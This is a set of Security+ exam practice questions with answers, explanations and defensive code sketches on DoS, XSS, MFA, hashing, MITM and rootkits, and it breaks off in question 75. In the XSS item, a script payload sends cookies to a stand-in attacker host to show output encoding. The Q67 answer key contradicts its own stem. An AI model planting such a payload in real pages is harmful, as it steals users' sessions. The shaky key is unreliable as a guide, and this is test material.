CompTIA SY0-701 Security+ Exam Dumps and Practice Test Questions Set 4 Q 61-80


Question 61

Which type of attack attempts to overwhelm a system or network by sending excessive traffic to cause a disruption?

( A ) Phishing
( B ) Denial of Service (DoS)
( C ) SQL Injection
( D ) Man-in-the-Middle (MITM)

Answer: B

Explanation:

A Denial of Service (DoS) attack is designed to make a system, service, or network resource unavailable to its intended users by overwhelming it with a flood of traffic or sending malicious requests. Unlike phishing, which targets human behavior, SQL injection, which targets databases, or MITM attacks, which intercept communications, a DoS attack directly targets the availability of services. These attacks can take many forms, such as sending massive volumes of packets (flood attacks), exploiting application vulnerabilities to crash services, or consuming system resources until the system becomes unresponsive. Distributed Denial of Service (DDoS) attacks are an advanced variant where multiple compromised devices, often part of a botnet, coordinate to generate traffic, making mitigation more challenging.

Organizations defend against DoS attacks by implementing firewalls, intrusion prevention systems (IPS), traffic filtering, rate limiting, content delivery networks (CDNs), and robust network architecture. Monitoring traffic patterns and anomaly detection are essential to identify early signs of an attack. Effective mitigation combines technology with incident response planning to maintain availability and minimize downtime. Additionally, cloud-based services and redundant infrastructure can help absorb traffic surges caused by attacks. A comprehensive approach ensures the organization remains operational during an attack while maintaining security for other network components. DoS attacks emphasize the critical importance of designing systems with resilience and scalability to maintain service continuity and safeguard user access.
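Rate limiting, one of the mitigations listed above, is often implemented as a token bucket: each client gets a burst allowance that refills over time, and excess requests are dropped. The following minimal Python sketch (rate and capacity values are arbitrary examples, not recommendations) illustrates the idea:

```python
import time

class TokenBucket:
    """Illustrative token-bucket rate limiter: allows bursts up to
    `capacity` requests, refilling at `rate` tokens per second."""

    def __init__(self, rate: float, capacity: int):
        self.rate = rate
        self.capacity = capacity
        self.tokens = float(capacity)
        self.last = time.monotonic()

    def allow(self) -> bool:
        now = time.monotonic()
        # Refill tokens based on elapsed time, capped at capacity.
        self.tokens = min(self.capacity,
                          self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= 1:
            self.tokens -= 1
            return True
        return False  # excess traffic is rejected (or queued/delayed)

bucket = TokenBucket(rate=5, capacity=10)
results = [bucket.allow() for _ in range(20)]  # a burst of 20 requests
print(results.count(True))  # only roughly the burst capacity gets through
```

Real deployments apply this per source IP or per session at the firewall, load balancer, or CDN edge, so a flood from one origin cannot starve other users.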

Question 62

Which type of malware disguises itself as legitimate software to trick users into executing it?

( A ) Trojan
( B ) Worm
( C ) Rootkit
( D ) Spyware

Answer: A

Explanation:

A Trojan is a type of malicious software that masquerades as a legitimate application or file to deceive users into installing or executing it. Unlike worms, which self-replicate and spread, or rootkits, which provide hidden administrative control, Trojans rely on social engineering techniques to compromise systems. Once installed, Trojans can create backdoors, steal sensitive data, log keystrokes, or download additional malware. 

They are often delivered through email attachments, malicious downloads, or fake software updates. Users may unknowingly introduce Trojans into their environment by trusting seemingly authentic sources. Protecting against Trojans requires a combination of endpoint security, updated antivirus and anti-malware solutions, user training, and secure browsing practices. Network monitoring and intrusion detection can help identify suspicious activity triggered by Trojan execution. Implementing least privilege principles ensures that even if a Trojan executes, its ability to impact the system is limited. Regular backups and patch management also reduce the potential damage of Trojan infections. Understanding Trojan behavior, combined with preventative measures, is critical for maintaining organizational security and safeguarding sensitive information from unauthorized access.

Question 63

Which protocol provides encrypted communication for remote administration of network devices?

( A ) Telnet
( B ) SSH
( C ) FTP
( D ) HTTP

Answer: B

Explanation:

SSH, or Secure Shell, is a network protocol that provides encrypted communication for remote administration of devices such as servers, switches, and routers. Unlike Telnet, which transmits data in plaintext, SSH ensures confidentiality and integrity of commands sent over untrusted networks. FTP is used for file transfers, and HTTP transmits web traffic unencrypted, gaining protection only when combined with TLS as HTTPS. SSH uses asymmetric encryption for session initiation and symmetric encryption for data transfer, preventing eavesdropping, session hijacking, and tampering.

It also supports authentication methods including passwords, public keys, and multifactor solutions. SSH is widely adopted for secure management of systems in enterprise environments, particularly when remote access is necessary. Implementing SSH key management, disabling root login over SSH, enforcing strong encryption algorithms, and using network segmentation further enhance security. SSH also supports tunneling, which allows secure transmission of additional protocols through encrypted channels. By adopting SSH for administrative tasks, organizations protect critical infrastructure from interception, unauthorized access, and network-based attacks while maintaining compliance with security best practices.
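The hardening steps above map to a few common OpenSSH server directives. The excerpt below is a sketch, not a complete policy; the group name is a hypothetical example, and option availability should be checked against the OpenSSH version in use:

```
# /etc/ssh/sshd_config (excerpt) — hardening sketch
PermitRootLogin no            # no direct root login over SSH
PasswordAuthentication no     # require public-key authentication
MaxAuthTries 3                # limit authentication attempts per connection
AllowGroups ssh-admins        # restrict SSH access to a dedicated admin group
```

After editing, the configuration is typically validated with `sshd -t` before reloading the service, so a typo cannot lock administrators out.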

Question 64

Which security control limits user access based on their job responsibilities?

( A ) Role-Based Access Control (RBAC)
( B ) Mandatory Access Control (MAC)
( C ) Discretionary Access Control (DAC)
( D ) Attribute-Based Access Control (ABAC)

Answer: A

Explanation:

Role-Based Access Control (RBAC) is a security mechanism that restricts access to systems, applications, or data based on predefined roles aligned with job responsibilities. Unlike Mandatory Access Control, which enforces centralized policies, or Discretionary Access Control, which allows resource owners to set permissions, RBAC focuses on organizational roles. Attribute-Based Access Control adds flexibility by considering contextual attributes. 

RBAC simplifies permission management, reduces administrative overhead, and enforces the principle of least privilege by granting users only the permissions required to perform their duties. Roles are typically defined according to organizational functions, job titles, or departments. Implementation involves identifying roles, mapping permissions, and regularly auditing access rights to accommodate changes in responsibilities. RBAC also supports regulatory compliance by providing auditable access logs and ensuring that sensitive data is only accessible to authorized personnel. By using RBAC, organizations prevent unauthorized access, mitigate insider threats, and maintain operational security while improving administrative efficiency and scalability of access management.
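The role-to-permission mapping described above can be sketched in a few lines of Python. The role names, permissions, and users here are invented for illustration:

```python
# Minimal RBAC sketch: roles map to permission sets; users map to roles.
# All role, permission, and user names are hypothetical examples.
ROLE_PERMISSIONS = {
    "hr_analyst": {"read_employee_records"},
    "hr_manager": {"read_employee_records", "edit_employee_records"},
    "it_admin":   {"manage_accounts", "reset_passwords"},
}

USER_ROLES = {
    "alice": {"hr_manager"},
    "bob":   {"hr_analyst"},
}

def is_authorized(user: str, permission: str) -> bool:
    """A user holds a permission only if one of their roles grants it."""
    return any(permission in ROLE_PERMISSIONS.get(role, set())
               for role in USER_ROLES.get(user, set()))

print(is_authorized("alice", "edit_employee_records"))  # True
print(is_authorized("bob", "edit_employee_records"))    # False
```

Because permissions attach to roles rather than individuals, a job change is handled by reassigning one role instead of auditing dozens of individual grants, which is where the administrative savings come from.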

Question 65

Which attack exploits a vulnerability in web applications by injecting malicious scripts into webpages viewed by other users?

( A ) Cross-Site Scripting (XSS)
( B ) SQL Injection
( C ) Command Injection
( D ) Directory Traversal

Answer: A

Explanation:

Cross-Site Scripting (XSS) is a type of cyberattack that targets web applications by injecting malicious scripts into webpages that are then viewed by other users. Unlike SQL injection, which manipulates backend databases, or command injection, which allows attackers to execute system-level commands, XSS exploits vulnerabilities in client-side code and the way web browsers interpret and display content. By exploiting these vulnerabilities, attackers can steal sensitive information such as session cookies, authentication tokens, or personal data, and even redirect users to malicious websites, potentially leading to further compromise of their accounts or devices.

XSS attacks are typically classified into three main categories: stored, reflected, and DOM-based. Stored XSS occurs when malicious input is permanently saved on a server, such as in a database or comment section, and is delivered to every user who accesses the affected page. Reflected XSS, on the other hand, involves malicious scripts that are embedded in a URL or input that is immediately processed by the web application and displayed back to the user, usually after they click a link. DOM-based XSS operates entirely within the client’s browser, manipulating Document Object Model (DOM) elements without interacting with the server directly, often exploiting client-side scripts to execute malicious code.

Preventing XSS requires a combination of secure coding practices, thorough input validation, and careful handling of user-generated content. Output encoding is essential to ensure that scripts or HTML tags submitted by users are treated as data rather than executable code. Implementing content security policies (CSPs) helps restrict the execution of untrusted scripts, reducing the potential attack surface. Web application firewalls (WAFs) can provide additional protection by filtering malicious input before it reaches the application.

Organizations must also adopt secure development lifecycle practices, including regular security testing, code reviews, and automated vulnerability scanning to detect and remediate XSS flaws early. Educating developers and users about the risks associated with XSS is crucial to maintaining a strong security posture. By combining these preventive measures with monitoring and incident response strategies, organizations can safeguard sensitive data, protect user privacy, maintain trust, and ensure compliance with industry security standards, particularly for applications that handle personal or financial information.
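Output encoding, the core defense described above, can be illustrated with Python's standard `html.escape`: once the markup characters are encoded, the browser renders a submitted payload as inert text instead of executing it. The payload URL below is a made-up example:

```python
import html

# A hypothetical attacker-supplied comment containing a cookie-stealing script.
user_comment = '<script>location="https://evil.example/?c="+document.cookie</script>'

# Output encoding: <, >, &, and quotes become HTML entities,
# so the browser treats the payload as data, not executable code.
safe = html.escape(user_comment)
print(safe)
```

The same principle applies in any templating system: encode at output time, in the context (HTML body, attribute, URL, JavaScript) where the data is inserted.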

Question 66

Which method is used to verify a user’s identity by requiring multiple forms of evidence?

( A ) Single-Factor Authentication
( B ) Multi-Factor Authentication (MFA)
( C ) Tokenization
( D ) CAPTCHA

Answer: B

Explanation:

Multi-Factor Authentication (MFA) is a security mechanism designed to enhance access control by requiring users to present multiple forms of verification before being granted access to systems, applications, or sensitive data. Unlike single-factor authentication, which relies solely on a password or PIN, MFA combines different types of credentials to create a layered defense. Typically, these factors include something the user knows, such as a password or security question; something the user has, such as a hardware token, smart card, or mobile authentication app; and something the user is, such as a fingerprint, facial recognition, or other biometric data. By requiring multiple forms of verification, MFA significantly reduces the risk of unauthorized access even if one credential is compromised.

MFA is particularly effective against common cyber threats, including phishing attacks, credential stuffing, and brute-force attacks. While attackers may be able to obtain a password, gaining access to the second or third authentication factor is considerably more difficult, making it a critical tool for protecting sensitive accounts and systems. Tokenization, which replaces sensitive data with unique tokens, and CAPTCHAs, which distinguish human users from automated bots, are often used alongside MFA to enhance security and reduce exposure to automated attacks.

Organizations widely adopt MFA for securing online services, enterprise networks, cloud platforms, and remote access solutions. Implementing MFA effectively requires careful selection of authentication factors, proper user training, and ongoing review of access policies to ensure they remain aligned with security requirements. Integrating MFA with identity and access management (IAM) systems, single sign-on (SSO) solutions, and endpoint monitoring further strengthens security by enabling centralized oversight and automated enforcement of access controls.
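The "something the user has" factor is frequently a TOTP authenticator app. A minimal sketch of the underlying algorithm (HOTP per RFC 4226, time-based per RFC 6238), using only the Python standard library, looks like this:

```python
import hashlib, hmac, struct, time

def hotp(secret: bytes, counter: int, digits: int = 6) -> int:
    """RFC 4226 HMAC-based one-time password (the basis of TOTP apps)."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                                  # dynamic truncation
    code = int.from_bytes(mac[offset:offset + 4], "big") & 0x7FFFFFFF
    return code % (10 ** digits)

def totp(secret: bytes, step: int = 30, at=None) -> int:
    """RFC 6238 time-based variant: the counter is the current 30 s window."""
    t = time.time() if at is None else at
    return hotp(secret, int(t // step))

# RFC 4226 test vector: counter 1 with this shared secret yields 287082.
print(hotp(b"12345678901234567890", 1))
```

The server and the user's device share the secret and compute the same code independently; a phished password alone is useless without the current six-digit window.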

Question 67

Which type of vulnerability scanning technique simulates an attack to identify potential weaknesses without causing harm?

( A ) Passive Scanning
( B ) Active Scanning
( C ) Penetration Testing
( D ) Vulnerability Assessment

Answer: D

Explanation:

A vulnerability assessment is a structured and methodical process designed to identify, evaluate, and prioritize security weaknesses across an organization’s systems, networks, and applications. Its primary goal is to provide a clear understanding of potential risks without actively exploiting the vulnerabilities, which distinguishes it from penetration testing. Whereas penetration testing simulates real-world attacks to assess the effectiveness of defenses, vulnerability assessments focus on discovery and analysis, minimizing the likelihood of operational disruption while highlighting areas that require attention.

There are different approaches to conducting vulnerability assessments. Passive scanning involves monitoring network traffic and system behavior to detect anomalies and potential weaknesses without generating additional network activity. Active scanning, on the other hand, involves sending probes and requests to systems to detect open ports, misconfigurations, outdated software, and known vulnerabilities. Both approaches rely on automated tools, vulnerability databases, and risk scoring systems to evaluate the potential impact of identified issues. These tools can quickly process large environments, flagging high-priority vulnerabilities for remediation and helping security teams allocate resources efficiently.

The results of a vulnerability assessment are critical for guiding organizational security strategies. They provide actionable insights into misconfigurations, unpatched software, weak policies, and other gaps that could be exploited by attackers. Organizations use these findings to prioritize patch management, adjust security configurations, and implement preventive controls. Regular vulnerability assessments, when combined with continuous monitoring and robust patch management practices, contribute to maintaining a secure environment, reducing attack surfaces, and improving overall security posture.

In addition to technical benefits, vulnerability assessments support compliance with industry regulations and standards, offering documented evidence of proactive risk management. By integrating assessments with broader security processes, including risk management, security awareness programs, and incident response planning, organizations create a comprehensive defense framework. This holistic approach ensures vulnerabilities are addressed before they can be exploited, enhancing the resilience of systems, networks, and applications against evolving cyber threats while safeguarding critical assets and sensitive information.

Question 68

Which cryptographic technique ensures data integrity by producing a unique fixed-size output for any input message?

( A ) Symmetric Encryption
( B ) Hashing
( C ) Asymmetric Encryption
( D ) Digital Signing

Answer: B

Explanation:

Hashing is a fundamental cryptographic technique that transforms any input data into a fixed-length string of characters, known as a hash value. Its primary purpose is to ensure data integrity by allowing verification that the original information has not been altered during storage or transmission. Unlike encryption, whether symmetric or asymmetric, which focuses on maintaining confidentiality by making data unreadable to unauthorized users, hashing is one-way and irreversible, meaning that the original data cannot be reconstructed from the hash alone. This makes it particularly useful for scenarios where verification is needed without exposing sensitive information.

Hashing is widely employed in a variety of cybersecurity applications. For example, it is commonly used for storing passwords securely. Instead of saving the plaintext password, systems store its hash, so even if the database is compromised, the actual passwords remain protected. Hashing is also integral to message authentication codes (MACs), which verify that messages have not been tampered with, and in digital signatures, where a hash of the message is signed to validate authenticity and integrity. In blockchain technology, hashing ensures the integrity of transaction records by linking blocks together in a tamper-evident manner.

A key property of effective hash functions is that even a minor change in input data results in a drastically different hash, a characteristic known as the avalanche effect. This makes any unauthorized modifications easily detectable. Security considerations when implementing hashing include selecting strong algorithms with high collision resistance, such as SHA-256 or SHA-3, avoiding deprecated algorithms like MD5, and staying updated on emerging threats that may weaken certain hashing methods.

By providing reliable integrity verification, hashing plays a crucial role in maintaining trust in digital communications, securing authentication mechanisms, and supporting compliance with data protection standards. Organizations integrate hashing into their broader cybersecurity strategies to detect tampering, validate file and message authenticity, and ensure that sensitive information remains protected, even in environments exposed to potential attacks. This combination of integrity assurance and irreversible protection makes hashing a cornerstone of modern cybersecurity practices.
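Both the fixed-size output and the avalanche effect are easy to observe with Python's standard `hashlib`; the messages below are arbitrary examples:

```python
import hashlib

# SHA-256 of two messages differing by a single character.
h1 = hashlib.sha256(b"transfer $100 to account 42").hexdigest()
h2 = hashlib.sha256(b"transfer $900 to account 42").hexdigest()

# Fixed-size output regardless of input length: 64 hex chars = 256 bits.
print(len(h1))

# Avalanche effect: a one-character change alters most of the digest.
diff = sum(a != b for a, b in zip(h1, h2))
print(h1 == h2, diff)
```

This is exactly why a recipient comparing a file's published hash against a freshly computed one can detect even a single flipped bit in transit.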

Question 69

Which network security device inspects incoming and outgoing traffic and blocks suspicious activity based on predefined rules?

( A ) Router
( B ) Firewall
( C ) Switch
( D ) Proxy

Answer: B

Explanation:

A firewall is a network security device designed to monitor, filter, and control incoming and outgoing traffic based on predefined security rules, creating a barrier between trusted internal networks and untrusted external networks such as the internet. Its primary function is to enforce organizational security policies by allowing legitimate traffic while blocking unauthorized or potentially harmful communications. Unlike routers and switches, which focus primarily on directing network traffic, or proxies that act as intermediaries for requests, firewalls specifically examine traffic for compliance with security rules and take action to prevent threats from reaching protected systems.

There are several types of firewalls, each providing different levels of protection. Packet-filtering firewalls examine packets based on source and destination addresses, ports, and protocols, providing a basic level of access control. Stateful inspection firewalls maintain awareness of active connections and can make decisions based on the state of network sessions, offering more context-aware protection. Proxy-based firewalls act as intermediaries that evaluate requests before forwarding them, often masking internal network structures. Next-generation firewalls (NGFWs) integrate advanced features such as deep packet inspection, intrusion prevention systems (IPS), application awareness, and the ability to detect complex attack patterns, providing more robust defense against modern threats.

Effective firewall deployment requires careful planning and configuration. Organizations must define rules that balance security with operational needs, regularly monitor firewall logs to detect suspicious activity, and update policies to address emerging threats. Firewalls play a critical role in preventing malware infiltration, mitigating distributed denial-of-service (DDoS) attacks, controlling unauthorized access, and supporting compliance with regulatory requirements.
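The packet-filtering logic described above, first matching rule wins, with an explicit default-deny at the end, can be sketched as follows. The rule set and syntax are a toy illustration, not any real firewall's configuration language:

```python
# Toy packet-filtering sketch: first matching rule wins, default deny.
# Rules, protocols, and ports are illustrative examples only.
RULES = [
    {"action": "allow", "proto": "tcp", "dst_port": 443},   # inbound HTTPS
    {"action": "allow", "proto": "tcp", "dst_port": 22},    # inbound SSH
    {"action": "deny",  "proto": "any", "dst_port": None},  # default deny
]

def evaluate(packet: dict) -> str:
    for rule in RULES:
        proto_ok = rule["proto"] in ("any", packet["proto"])
        port_ok = rule["dst_port"] in (None, packet["dst_port"])
        if proto_ok and port_ok:
            return rule["action"]
    return "deny"  # fail closed if no rule matched

print(evaluate({"proto": "tcp", "dst_port": 443}))   # allow
print(evaluate({"proto": "udp", "dst_port": 161}))   # deny
```

Stateful and next-generation firewalls extend this core idea with connection tracking and payload inspection, but rule ordering and a fail-closed default remain the foundation.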

Question 70

Which social engineering attack involves tricking individuals into revealing sensitive information over the phone?

( A ) Vishing
( B ) Phishing
( C ) Smishing
( D ) Tailgating

Answer: A

Explanation:

Vishing, short for voice phishing, is a type of social engineering attack in which attackers use phone calls to deceive individuals into divulging sensitive information, such as passwords, banking credentials, credit card numbers, or personally identifiable information. Unlike traditional phishing, which primarily targets users through email, or smishing, which relies on fraudulent text messages, vishing exploits the telephone as the primary communication channel. Attackers often use psychological manipulation techniques, including creating a sense of urgency, fear, or authority, to coerce victims into providing confidential information. They may impersonate trusted figures such as bank representatives, IT support personnel, government officials, or company executives, leveraging familiarity and trust to increase the likelihood of success.

Vishing attacks can be highly effective because they exploit human behavior rather than technical vulnerabilities. Attackers may claim that immediate action is required to prevent account suspension, financial loss, or legal consequences, prompting victims to act without verifying the caller’s legitimacy. Unlike tailgating, which breaches physical security by following authorized personnel into restricted areas, vishing focuses on extracting information remotely, often without any digital trace.

Mitigating vishing requires a combination of user awareness, procedural safeguards, and technical controls. Employee training is critical to help individuals recognize suspicious calls, question unsolicited requests for sensitive data, and follow verification protocols before disclosing any information. Organizations can implement policies that prohibit sharing confidential details over the phone without proper authentication or multi-step validation. Technical measures such as call-blocking services, spam and robocall filters, and monitoring systems that detect suspicious calling patterns further reduce risk.

Addressing vishing emphasizes the importance of integrating human vigilance with organizational security policies and technical safeguards. By fostering a culture of skepticism toward unsolicited calls, establishing verification processes, and deploying supportive technologies, organizations can significantly reduce the likelihood of sensitive information being compromised. Effective vishing defense not only protects personal and corporate assets but also reinforces overall security awareness, helping maintain trust and operational integrity across business operations and digital communications.

Question 71

Which security model enforces access controls based on a user’s security clearance and data classification level?

( A ) Discretionary Access Control (DAC)
( B ) Mandatory Access Control (MAC)
( C ) Role-Based Access Control (RBAC)
( D ) Attribute-Based Access Control (ABAC)

Answer: B

Explanation:

Mandatory Access Control (MAC) is a highly structured and rigorous access control model designed to enforce strict security policies across an organization. In MAC, access to resources is governed by centrally defined rules based on classifications and security clearances rather than being determined by the resource owner. This contrasts with Discretionary Access Control (DAC), where individual users or owners have the authority to grant or restrict access to files or resources at their discretion. The centralized and non-negotiable nature of MAC ensures that access decisions remain consistent, predictable, and aligned with organizational security requirements, making it particularly suitable for environments where protecting sensitive information is critical.

In a MAC system, both users and resources are assigned security labels. Users are given a clearance level, while resources such as files, databases, or applications are assigned classification labels. Access is permitted only when the user’s clearance meets or exceeds the classification of the resource. This approach effectively enforces the principle of least privilege, ensuring that users can access only the information necessary to perform their roles, reducing the risk of accidental disclosure or intentional misuse of sensitive data. By strictly regulating access based on policy, MAC mitigates insider threats and enforces compliance with regulatory or organizational standards.

Implementation of MAC requires careful planning and execution. Data and resources must be accurately labeled according to sensitivity, and users must be assigned appropriate clearance levels. Operating systems, security modules, or specialized software enforce these policies, automatically controlling access without requiring intervention from resource owners. Continuous auditing and monitoring are essential components of MAC, allowing organizations to verify compliance, detect unauthorized access attempts, and adjust policies as needed.

MAC is widely used in government, military, defense, and other high-security sectors where the confidentiality and integrity of information are paramount. By providing a robust and structured framework for access control, MAC ensures that sensitive information is strictly protected, minimizing the likelihood of accidental or malicious exposure. Its disciplined approach to access management also supports adherence to regulatory standards, ensuring that organizations maintain both security and accountability across their systems and operations.
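The clearance-versus-classification comparison at the heart of MAC can be sketched as a Bell-LaPadula-style "no read up" check. The level names and ordering are the classic government example, used here purely for illustration:

```python
# Bell-LaPadula-style "no read up": a subject may read an object only
# when its clearance dominates the object's classification.
# Level names and ordering are illustrative.
LEVELS = {"unclassified": 0, "confidential": 1, "secret": 2, "top_secret": 3}

def can_read(clearance: str, classification: str) -> bool:
    return LEVELS[clearance] >= LEVELS[classification]

print(can_read("secret", "confidential"))  # True: clearance dominates
print(can_read("confidential", "secret"))  # False: reading up is denied
```

Note that neither the user nor the file owner can override this comparison; only the central policy (the `LEVELS` lattice and the labels) determines the outcome, which is precisely what distinguishes MAC from DAC.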

Question 72

Which attack involves intercepting communications between two parties to eavesdrop or alter data?

( A ) Denial of Service (DoS)
( B ) Man-in-the-Middle (MITM)
( C ) Cross-Site Request Forgery (CSRF)
( D ) Phishing

Answer: B

Explanation:

A Man-in-the-Middle (MITM) attack is a form of cyber threat where an attacker secretly intercepts or alters communication between two parties without their knowledge. Unlike attacks that focus on availability, such as Denial-of-Service (DoS), or attacks that primarily exploit human behavior, like phishing, MITM attacks compromise the confidentiality, integrity, and authenticity of data in transit. By positioning themselves between the sender and receiver, attackers can monitor communications, capture sensitive information, manipulate data, or inject malicious content. This makes MITM attacks particularly dangerous in scenarios involving financial transactions, login credentials, or private communications.

There are several common techniques used to carry out MITM attacks. ARP spoofing allows attackers to associate their MAC address with the IP address of a legitimate device, enabling interception of local network traffic. DNS hijacking redirects users to malicious websites by altering DNS resolution. Rogue Wi-Fi hotspots or unsecured public networks are frequently exploited to eavesdrop on unsuspecting users. SSL stripping, on the other hand, downgrades secure HTTPS connections to unencrypted HTTP, exposing sensitive data. Attackers can use these methods to steal passwords, manipulate financial transactions, or implant malware, often without immediate detection.

Protecting against MITM attacks requires a combination of technical controls, secure protocols, and user awareness. Strong encryption protocols, such as HTTPS and TLS, ensure that intercepted communications cannot be easily deciphered. Validating digital certificates and ensuring proper key exchange mechanisms prevent attackers from impersonating trusted parties. Virtual Private Networks (VPNs) add an additional layer of encryption, particularly on public networks. Multi-factor authentication further reduces the risk of unauthorized access even if credentials are intercepted. Organizations should also implement continuous network monitoring to detect anomalies such as unexpected routing changes, certificate warnings, or unusual traffic patterns.

User education plays a critical role in preventing MITM attacks. Training users to recognize suspicious networks, avoid untrusted Wi-Fi, and verify the authenticity of websites or communications strengthens overall security. By combining encryption, secure authentication, monitoring, and user awareness, organizations can build a layered defense against MITM attacks, protecting sensitive data, maintaining the integrity of communications, and fostering trust in digital systems and networks.
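The integrity protection that defeats in-transit tampering can be illustrated with a keyed MAC, one of the building blocks TLS uses internally. This sketch assumes a pre-shared key purely for demonstration; the key and messages are made up:

```python
import hashlib, hmac

# Integrity sketch: a keyed HMAC lets the receiver detect tampering.
# The shared key and messages are hypothetical examples.
key = b"shared-session-key"
message = b"pay vendor invoice #1004"
tag = hmac.new(key, message, hashlib.sha256).digest()

# An attacker in the middle alters the message but, lacking the key,
# cannot forge a tag that matches the modified content.
tampered = b"pay vendor invoice #9999"

print(hmac.compare_digest(
    tag, hmac.new(key, message, hashlib.sha256).digest()))   # True: intact
print(hmac.compare_digest(
    tag, hmac.new(key, tampered, hashlib.sha256).digest()))  # False: detected
```

`hmac.compare_digest` is used instead of `==` because constant-time comparison prevents an attacker from learning the tag byte by byte through timing differences.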

Question 73

Which security practice ensures that a backup copy can restore data after corruption, loss, or a ransomware attack?

( A ) Business Continuity Planning
( B ) Disaster Recovery
( C ) Data Classification
( D ) Network Segmentation

Answer: B

Explanation:

Disaster Recovery (DR) is a critical aspect of organizational security and business continuity that focuses on the rapid restoration of IT systems, applications, and data following unexpected disruptions. These disruptions can arise from a variety of sources, including natural disasters like floods or earthquakes, hardware failures, cyberattacks such as ransomware, or human errors that compromise operational systems. Unlike Business Continuity Planning, which takes a broader approach to keeping overall business operations running during crises, disaster recovery is specifically concerned with the technical recovery of information technology resources to bring systems back online as quickly and reliably as possible.

A comprehensive disaster recovery strategy typically involves regular data backups, secure offsite storage, and redundant systems that allow for failover in the event of a system outage. Backups must be maintained carefully to ensure data integrity, particularly in the face of threats like ransomware, which can target backup files to prevent recovery. DR plans also define recovery objectives, including the Recovery Time Objective (RTO), which specifies the maximum acceptable downtime, and the Recovery Point Objective (RPO), which indicates the maximum tolerable data loss. These metrics guide the design of backup frequency, redundancy mechanisms, and system recovery procedures.

Testing and validation are essential components of disaster recovery. Regular drills ensure that personnel understand the steps required to restore systems under pressure and that the backup data can be reliably accessed and restored. Additionally, DR planning often includes documenting recovery workflows, assigning roles and responsibilities, and ensuring that communication channels remain functional during a crisis. By implementing these measures, organizations can minimize operational disruption, reduce the risk of data loss, and maintain the confidentiality, integrity, and availability of critical information.

A well-structured disaster recovery framework not only protects IT infrastructure but also supports regulatory compliance and reinforces organizational resilience. It provides stakeholders with confidence that critical business functions can resume quickly and securely after a disruptive event. Ultimately, disaster recovery is a foundational element of an organization’s cybersecurity and risk management strategy, ensuring continuity and operational stability in the face of unexpected incidents.
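Backup integrity verification, checking that a backup still matches the checksum recorded when it was taken, is one concrete DR validation step. This sketch uses temporary files as stand-ins for a real backup set:

```python
import hashlib, os, shutil, tempfile

# Backup-verification sketch: record a checksum at backup time,
# then confirm it before restoring. Paths are temporary stand-ins.
def sha256_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            h.update(chunk)  # stream in chunks so large files fit in memory
    return h.hexdigest()

workdir = tempfile.mkdtemp()
source = os.path.join(workdir, "db.dump")
backup = os.path.join(workdir, "db.dump.bak")

with open(source, "wb") as f:
    f.write(b"customer records v1")
shutil.copy(source, backup)
recorded = sha256_file(source)       # stored alongside the backup catalog

# Later, before restoring: does the backup still match the recorded hash?
intact = sha256_file(backup) == recorded
print(intact)  # True means the copy has not been corrupted or tampered with
shutil.rmtree(workdir)
```

A mismatch here, for example after a ransomware actor has encrypted the backup files, is exactly the failure this check is meant to surface before a restore is attempted.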

Question 74

Which type of malware hides its presence by modifying system processes and kernel-level operations?

( A ) Rootkit
( B ) Trojan
( C ) Worm
( D ) Adware

Answer: A

Explanation:

A rootkit is an advanced form of malicious software specifically engineered to gain and sustain privileged access to a computer system while remaining undetected. Unlike other types of malware, such as Trojans, which require a user to execute them, or worms, which spread autonomously across networks, rootkits operate at a deep system level, often integrating with the kernel or core operating system components. By embedding themselves within critical processes, drivers, or system calls, rootkits can manipulate normal system behavior, making them extremely difficult to detect with conventional security tools like antivirus programs or intrusion detection systems. This stealthy operation allows attackers to maintain long-term control over compromised systems without alerting users or security administrators.

Rootkits are frequently used to carry out espionage, steal sensitive data, or enable unauthorized remote access. Because they conceal their presence so effectively, they can persist on a system for extended periods, allowing attackers to conduct covert operations and potentially escalate their privileges further. Detection of rootkits often requires specialized approaches, including integrity checking of system files, behavioral monitoring to spot anomalies, memory analysis, and offline scanning using trusted environments where the rootkit cannot interfere.

Preventing rootkit infections relies on a combination of proactive security measures. Regularly applying software patches and updates helps close vulnerabilities that attackers might exploit to install a rootkit. Implementing strict access controls and minimizing the use of administrative privileges reduces the opportunities for malware to gain high-level access. Security solutions that use heuristic analysis and behavior-based detection can provide additional layers of defense against previously unknown threats.

Rootkits highlight the necessity of a multi-layered security strategy, as they target both the integrity and confidentiality of systems and dat( A ) Continuous monitoring, endpoint protection, and prompt incident response are crucial to mitigate the risks associated with rootkits. Organizations must prioritize early detection, preventive measures, and rigorous security hygiene to safeguard networks and endpoints from these highly persistent and covert threats. By doing so, they can reduce the risk of long-term compromise and protect critical assets from sophisticated malicious actors.

Question 75

Which security technology encrypts web traffic between a browser and a web server to ensure confidentiality?

( A ) HTTP
( B ) HTTPS
( C ) FTP
( D ) Telnet

Answer: B

Explanation:

HTTPS, which stands for Hypertext Transfer Protocol Secure, is a communication protocol designed to protect data transmitted between a web browser and a web server. Unlike HTTP, which sends data in plain text and can be intercepted or modified by attackers, HTTPS uses encryption to ensure the confidentiality and integrity of information exchanged online. This encryption is provided through Transport Layer Security (TLS), a cryptographic protocol that safeguards data against eavesdropping, man-in-the-middle attacks, and tampering during transmission. By encrypting communications, HTTPS ensures that sensitive information such as login credentials, personal details, and financial transactions remain private and secure.

One of the key elements of HTTPS is the use of digital certificates issued by trusted Certificate Authorities (CAs). These certificates authenticate the identity of the server, assuring users that they are connecting to the legitimate website and not a malicious impostor. The TLS handshake process establishes a secure session by combining asymmetric encryption for securely exchanging cryptographic keys and symmetric encryption for efficiently encrypting the data itself. This approach balances strong security with minimal impact on performance, making HTTPS suitable for a wide range of web applications.
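The client side of certificate validation is visible in Python's standard `ssl` module: a default TLS context already enforces the checks described above, requiring a certificate chain to a trusted CA and a hostname match before any data is exchanged. This sketch only inspects the context's settings; no network connection is made.

```python
import ssl

# A default context is configured for server authentication: it requires a
# valid certificate chain to a trusted Certificate Authority and verifies
# that the certificate matches the hostname the client asked for.
ctx = ssl.create_default_context()

print(ctx.verify_mode == ssl.CERT_REQUIRED)  # True: chain must validate
print(ctx.check_hostname)                    # True: hostname must match

# Wrapping a TCP socket with ctx.wrap_socket(sock, server_hostname=...)
# would perform the TLS handshake described above: asymmetric key exchange
# first, then symmetric encryption of the application data.
```

Disabling either check (as some quick-fix snippets found online do) reopens the door to man-in-the-middle attacks, which is exactly what HTTPS exists to prevent.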

